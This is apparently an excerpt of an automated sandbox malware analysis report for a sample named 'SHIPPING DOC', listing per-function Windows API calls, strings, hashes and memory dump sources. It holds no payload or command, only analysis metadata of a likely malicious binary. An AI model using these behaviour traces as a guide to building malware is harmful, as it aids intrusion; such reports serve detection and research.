                                                                                                                      • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                      • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                      APIs
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                      • IsMenu.USER32(?), ref: 0044854D
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                      • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3076010158-4108050209
                                                                                                                      • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                      • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                      • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                      • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                      • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_memmove_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1589278365-1403004172
                                                                                                                      • Opcode ID: 0014777097789b8f84f3fe106d7e17ae724925b3d4bce213ca40c56104f0711f
                                                                                                                      • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                      • Opcode Fuzzy Hash: 0014777097789b8f84f3fe106d7e17ae724925b3d4bce213ca40c56104f0711f
                                                                                                                      • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Handle
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 2519475695-2873401336
                                                                                                                      • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                      • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                      • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                      • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Handle
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 2519475695-2873401336
                                                                                                                      • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                      • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                      • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                      • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                      • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                      • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                      • String ID: Line:
                                                                                                                      • API String ID: 1874344091-1585850449
                                                                                                                      • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                      • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                      • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                      • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      • API String ID: 0-1011021900
                                                                                                                      • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                      • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                      • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                      • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                      • GetFocus.USER32 ref: 0046157B
                                                                                                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                      • __swprintf.LIBCMT ref: 00461608
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                      • String ID: %s%d
                                                                                                                      • API String ID: 2645982514-1110647743
                                                                                                                      • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                      • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                      • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                      • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                      • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                      • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                      • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3488606520-0
                                                                                                                      • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                      • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                      • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                      • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 15295421-0
                                                                                                                      • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                      • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                      • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                      • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2449869053-0
                                                                                                                      • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                      • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                      • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                      • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                      • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                      • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3539004672-0
                                                                                                                      • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                      • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                      • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                      • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                      APIs
                                                                                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 327565842-0
                                                                                                                      • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                      • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                      • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                      • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                      APIs
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
